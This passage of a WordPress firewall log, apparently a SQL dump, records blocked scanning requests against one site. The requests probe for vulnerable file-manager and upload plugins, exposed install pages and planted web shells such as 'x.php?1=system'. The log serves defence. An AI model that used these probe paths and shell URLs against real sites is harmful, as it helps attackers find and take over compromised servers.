Safari\\/537.36\",\"2\":\"www.google.com\"}','cmCWjrKH9Ovqe84yV5XAuJi1',0,1680310597.8580,282,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','https://cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','YRuKcQ9Bxl8rOi4JdH6vqhL5',0,1680310589.8860,285,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/plugins/anttt/simple.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Wp4kF8BQuw5xLvJGAf9XUeOl',0,1680310572.1289,2324,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','ihI7FovAETG5SB2rMZWUXpfw',0,1680331713.4857,1001,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','NC1iaoXBHTdFfWOLr9sUEPQz',0,1680331712.1539,686,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','9Tva6rUIN0Jq8E42dXjs3fg5',0,1680331711.1863,347,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','icCJ5L3shRTolj9nDrX4ZxWF',0,1680331710.3051,318,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','Z8uTDmMLgbtE6O5Vk3zos9iG',0,1680331709.4660,293,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','xVjzZam3hDWdLYnt9bXGIrF5',0,1680331708.6388,290,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','BM4bF1LfzKI5RsDgq3moPApl',0,1680331707.7878,299,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','YwOoqCDbmzLnM9AyPr0p1kth',0,1680331706.9848,283,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','dZM0kBSFqxbjHX9vrEcz5eI3',0,1680331705.6030,306,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','GcK6aFuBX9APMbo8vQwUyfV1',0,1680331703.3751,870,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','dV5e0UIPhs2Sx6Qcq9vbKJ8l',0,1680331715.1558,676,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-includes/images/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','EPOJswygn8qtuRBFZifGCjQM',0,1680343925.0472,290,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/languages/plugins/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','E7CKe3v8xjzRYB1goly9hMIX',0,1680343919.9701,889,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/images/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','gmc8hueOtZpF40HnRJEkYN2j',0,1680343911.3991,296,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/css/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','fD8LK97eA5O6hUoswqjPZtpV',0,1680343906.7442,1545,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-includes/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','94eRC3IPpEyTBwV7YqXz80vr',0,1680343899.3268,311,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-admin/includes/about.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','nCP1eSr6gNBA2yE7HzkR48XI',0,1680343889.3149,393,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-admin/css/colors/blue/uploader.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','cuBztXjfapN7yEDYrOSLwvds',0,1680372348.0261,298,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/themes/ccx/index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','wq3hVbEtrpxTIiFn9aBJ625O',0,1680370825.8276,1660,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','zLpWqdSlKr1u0G9NxRV8QHeJ',0,1680388847.0365,303,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','yF6vuJYgLZ5BmEKiox1NUfWG',0,1680388846.2279,280,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/administrator/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','t741n6mwLDkPY0pjvZNlH2TU',0,1680378058.5161,1870,'','GET',403,0,700,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/plugins/jQuery-File-Upload/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','m1gziQZv7C8KjPknqyOD2TJL',0,1680379052.9508,1485,'','GET',403,0,700,0,1,'',0),('95.164.157.188',1604623804,'','https://cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','m3sMPQ6dy2BF9Tt8LZcAWVje',0,1680376691.5357,330,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/king.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','j4gHRWnN9cLKopkFE0u3swYd',0,1680388845.3960,295,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/x.php?1=system','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','BdGgJ0zVPpU59KZ6rluEQ7XT',0,1680388844.5870,290,'','POST',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','FtYpQH8vLs6Ou0rVzJMwkeR1',0,1680388843.3972,303,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','gRz3CDHsGPmOJxwht4lZLejK',0,1680388841.4380,321,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/plugins/apikey/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','hpwcjmtkC6VdERYLMlSZI21Q',0,1680388839.4705,310,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/plugins/apikey/apikey.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','0Zu5IfJlUC1zBSF3MPkytObi',0,1680388838.6446,294,'','POST',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9LobJRr1ljHuaGOKdm6gwU8e',0,1680388837.7560,324,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','N4vfnqJpXSrhO6gjuyKcIdQt',0,1680410497.9755,303,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','5JpugjaZCci9m2LNH4FfvxzY',0,1680410497.1003,289,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','RDCdI2Tn4PUJEiql7HzQrpFY',0,1680410496.1880,334,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','jGkui8rMdQqogt5TBYSO1XV0',0,1680410495.1209,484,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','d6nkotgJ7Zzj3PlxK4SqQfrR',0,1680416823.9574,307,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','zt9QUlCEGdeDcv2PFaO0yArs',0,1680416823.0047,340,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','3SEmQl5czI6tYsZLJ8uwgGpF',0,1680416821.4911,898,'','GET',403,0,700,0,1,'',0),('79.110.62.85',1332624981,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','sgeXBVt2h5CzFAOY1qrkcyZS',0,1680415260.4281,1740,'','POST',403,0,515,0,1,'',0),('79.110.62.85',1332624981,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','KIqj3ZRLJQwrD9iX2zVvUHcY',0,1680415258.1792,1637,'','POST',403,0,515,0,1,'',0),('66.115.146.176',1114870448,'','http://cmdev-site1.com//wp-content/plugins/ccx/index.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Mobile Safari\\/537.36\"}','HdBSuEcY3P0A8UrN4RsLl1mk',0,1680428551.8465,293,'','GET',403,0,700,0,1,'',0),('66.115.146.176',1114870448,'','http://cmdev-site1.com//wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Mobile Safari\\/537.36\"}','y3wHDor6AkcXZiVGRPWYhuge',0,1680428551.1357,323,'','GET',403,0,700,0,1,'',0),('66.115.146.176',1114870448,'','http://cmdev-site1.com//wp-content/themes/seoplugins/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Mobile Safari\\/537.36\"}','BbyWdJ6XLIxgoekqRjfH42PK',0,1680428549.9171,321,'','GET',403,0,700,0,1,'',0),('66.115.146.176',1114870448,'','http://cmdev-site1.com//wp-content/themes/pridmag/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Mobile Safari\\/537.36\"}','tWINAb5e7oTYgjKdsEXw0mcU',0,1680428549.1707,307,'','GET',403,0,700,0,1,'',0),('66.115.146.176',1114870448,'','http://cmdev-site1.com//index.php?3x=3x','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Mobile Safari\\/537.36\"}','mrEfgI4WaKL7NBkHVG32D6lw',0,1680428548.4771,296,'','GET',403,0,700,0,1,'',0),('66.115.146.176',1114870448,'','http://cmdev-site1.com//wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Mobile Safari\\/537.36\"}','fB5MJtwAL6NgTbl8o4imRKyS',0,1680428547.7678,306,'','GET',403,0,700,0,1,'',0),('66.115.146.176',1114870448,'','http://cmdev-site1.com//wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Mobile Safari\\/537.36\"}','LGB7qMxEVoc8l36OkX1ZHFWY',0,1680428543.9408,323,'','GET',403,0,700,0,1,'',0),('66.115.146.176',1114870448,'','http://cmdev-site1.com//wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Mobile Safari\\/537.36\"}','HxmGIld5Ok8iEzpuWjoN0bt9',0,1680428542.6491,322,'','GET',403,0,700,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?interim-login=1&wp_lang=en_US\"}','WNP8lqiHVZIC2vogpbRwrAfk',3,1680439607.9795,467,'','POST',200,0,600,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/edit.php?post_type=page\"}','zphAa56HjmBKN2ZVGnXQMTtY',0,1680439600.2477,1646,'','POST',200,0,500,0,1,'',510),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','oyTJ0dLXbQAwzvaiCSUs1cO9',0,1680476014.5127,285,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','76kstcJBH8fUuQ45VTFrYSOd',0,1680476013.6614,292,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/king.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','HJLTuE5cbqy9ozjAUwiWfeOv',0,1680476012.7753,304,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/x.php?1=system','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UWIDgebucNlrJXE2F3xVSkfw',0,1680476011.9404,294,'','POST',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','DTceGk1gd3HVwEL6zP4IAaNv',0,1680476010.7183,291,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6JNunOmXq4KL0UrMasipeVkw',0,1680476008.6806,290,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/plugins/apikey/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UkeV5BbaKtO2HLyZIW79qgJi',0,1680476006.7106,263,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/plugins/apikey/apikey.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','PEiLUYykdu6GaS15K37cx8mI',0,1680476005.8460,277,'','POST',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com//wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','0eDarMbdTgYZIWBzFpE479k8',0,1680476004.9680,300,'','GET',403,0,700,0,1,'',0),('95.216.148.85',1608029269,'','http://cmdev-site1.com/ty.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','5FP19CNsxkfYmU2WK6qvtjQA',0,1680475977.8912,288,'','GET',403,0,700,0,1,'',0),('95.216.148.85',1608029269,'','http://cmdev-site1.com/wp-includes/ty.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ThtxPpfiWcQzUlvAmVqH7Rdj',0,1680475973.1880,1505,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com//wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ezTu2gmZwKBSG4DpnW6vo3bF',0,1680471026.2638,288,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','SWfskhZMJaFzmIrLAndbuDoT',0,1680471025.3634,310,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com//wp-content/king.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6B1Yz4kQpgOFs0wSCo2cUxmf',0,1680471024.5353,282,'','GET',403,0,700,0,1,'',0),('108.167.56.152',1822898328,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36 Edg\\/111.0.1661.62\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?redirect_to=http%3A%2F%2Fcmdev-site1.com%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-plugin-upgrade&reauth=1\"}','gZGCH54nYQyhW6NuwIvExm0K',1,1680455741.3697,455,'','POST',302,0,600,0,1,'',510),('159.223.49.95',2682204511,'','http://cmdev-site1.com//wp-content/x.php?1=system','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','oVyWgdLSPUx3jaCEw2r6ncsG',0,1680471023.7176,287,'','POST',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com//abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 